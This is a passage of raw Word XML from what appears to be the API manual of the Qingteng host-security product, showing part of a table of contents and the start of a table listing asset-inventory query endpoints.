            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166381 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>485</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="79303843" w14:textId="74E3048D" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166382" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>16.56 基线检查风险级别</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166382 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>486</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="49EB52CF" w14:textId="22FF9243" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166383" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>16.57 pod状态</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166383 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>486</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="63D49B66" w14:textId="6B8EB690" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166384" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>16.58 快速任务类型</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166384 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>486</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6E5A8DD7" w14:textId="202229AB" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166385" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>16.59 快速任务执行时间范围</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166385 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>486</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="23005FA0" w14:textId="4188A1ED" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166386" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>16.60 快速任务扫描状态</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166386 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>487</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="44DED2C1" w14:textId="606153F7" w:rsidR="00100306" w:rsidRPr="000449B2" w:rsidRDefault="00BE0A15">
          <w:pPr>
            <w:rPr>
              <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="000449B2">
            <w:rPr>
              <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
              <w:bCs/>
              <w:color w:val="00A4C5"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="0BDD60EE" w14:textId="4719F133" w:rsidR="00F245F3" w:rsidRPr="000449B2" w:rsidRDefault="00F245F3" w:rsidP="00F245F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
        </w:rPr>
        <w:sectPr w:rsidR="00F245F3" w:rsidRPr="000449B2" w:rsidSect="009807A8">
          <w:pgSz w:w="11900" w:h="16840" w:code="9"/>
          <w:pgMar w:top="907" w:right="907" w:bottom="907" w:left="907" w:header="567" w:footer="283" w:gutter="0"/>
          <w:pgNumType w:fmt="upperRoman"/>
          <w:cols w:space="425"/>
          <w:docGrid w:type="lines" w:linePitch="423"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77022EEC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc115166077"/>
      <w:bookmarkStart w:id="4" w:name="概述"/>
      <w:bookmarkStart w:id="5" w:name="_Toc89700436"/>
      <w:bookmarkStart w:id="6" w:name="_Toc93066654"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>概述</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="29CF00D5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>青藤 API提供了青藤产品中部分功能的API获取接口，您可以利用该接口，灵活的获取各维度的信息，当前API提供如下查询 。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2261"/>
        <w:gridCol w:w="2482"/>
        <w:gridCol w:w="5339"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="6F329E8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55FB0D7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>功能名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="430FEA31" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>接口作用</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54983B95" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>接口名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1A4651D0" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03F9050E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>资产清点 - 主机信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03439360" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机扫描及查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52798092" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>/external/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/assets/host</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1AC084A1" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16BD4AD8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>资产清点 - 进程信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76ECEF5F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>进程扫描及查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7AA80479" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>/external/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/assets/process</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="19E0D908" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66ACD2E7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>资产清点 - 端口信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F23CD86" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>端口扫描及查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B904CD8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>/external/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/assets/port</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="77DB0CD8" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61F2C45F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t xml:space="preserve">资产清点 - </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>帐号</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="396460C1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>帐号</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>扫描及查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5AE0A9B3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>/external/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/assets/account</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4B4C4342" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2988ABFD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>资产清点 - 用户</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>组信息</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B3AC393" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>用户组扫描及查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="186DE739" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>/external/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/assets/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>accountgroup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="66189B7A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47BD14BE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>资产清点 - Web站点信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3BD187BA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>web站点扫描及查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7050C814" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>/external/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/assets/website</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2F9C04D5" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59118D08" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>资产清点 - Web 应用信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="115C5376" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>web应用扫描及查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DFA8A65" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>/external/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/assets/webapp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4291642A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F722571" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>资产清点 - 软件应用</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29130D29" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>软件应用扫描及查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5AEC9EB5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>/external/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/assets/app</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="09CCD361" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5EBC7400" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>资产清点 - Web应用框架</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7EBB0E8B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Web应用框架扫描及查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6929F5EF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>/external/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/assets/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>webframe</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6CBBBC0D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11D5E5E4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>资产清点 - 数据库</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55E11167" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>数据库扫描及查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36657163" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>/external/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/assets/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dbinfo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7D0ACB0E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="792A3DCC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>资产清点 - 启动项</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6491BDB5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>启动项扫描及查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4627B9AC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
